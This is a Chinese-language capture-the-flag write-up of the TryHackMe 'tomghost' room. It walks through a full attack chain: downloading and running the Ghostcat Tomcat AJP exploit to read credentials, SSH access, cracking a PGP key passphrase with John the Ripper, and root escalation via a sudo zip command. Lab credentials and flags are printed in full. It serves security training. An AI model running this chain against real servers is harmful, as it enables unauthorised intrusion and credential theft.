URL : https://tryhackme.com/room/tomghost

IP : 10.10.9.138

Scanning

• nmap -A 10.10.9.138
  • 
  • 有開的 port
    • 22 SSH 7.2ps
    • 53 tcpwarpped
    • 8009 AJP13 1.3
    • 8080 Tomcat 9.0.30

Exploit

• 使用 searchsploit 搜尋 AJP
  • searchsploit AJP
  • 可以找到 Apache Tomcat - AJP 'Ghostcat File Read/Inclusion
    • https://www.exploit-db.com/exploits/48143
  • wget https://www.exploit-db.com/download/48143
  • mv 48143 48143.py
  • python 48143.py
    • 
    • 就直接噴出帳號密碼ㄌ
      • 帳號 : skyfuck
      • 密碼 : 8730281lkjlkjdqlksalks

SSH 進去晃晃

• ssh skyfuck@10.10.9.138
• 發現家目錄裡面有兩個檔案
  • 
  • 先抓出來
    • scp -r skyfuck@10.10.9.138:/home/skyfuck .
• 在 /home/merlin 發現 user.txt
  • THM{GhostCat_1s_so_cr4sy}

暴力破解 pgp

• 看到一個 asc 檔案 跟一個 pgp 檔案
  • 用 file 觀察他們在幹嘛
  • 
  • .pgp 是加密後ㄉ東西
  • .asc 的是 private key
• pgp 轉 john
  • gpg2john tryhackme.asc > john_gpg
  • 備註 : gpg 是開源版本的 pgp
    • ref :　https://zh.wikipedia.org/wiki/PGP
  • 我們要破的是 .asc 的 private key 檔案求密碼
• 用 john 爆破，With rockyou.txt
  • john john_gpg --wordlist=/opt/rockyou.txt
  • 
  • 破出密碼為 alexandru
• gpg --decrypt credential.pgp
  • 輸入密碼
  • 
    • 取得 merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

提權

• su merlin
  • 輸入密碼
• sudo -l
  • (root : root) NOPASSWD: /usr/bin/zip
  • 發現有 zip 的 sudo 權限
• 到 GTFOBins 找 zip 提權方法
  • 可以 sudo 的
    • TF=$(mktemp -u)
    • sudo zip $TF /etc/hosts -T -TT 'sh #'
• 提權成功
  • 
  • root.txt : THM{Z1P_1S_FAKE}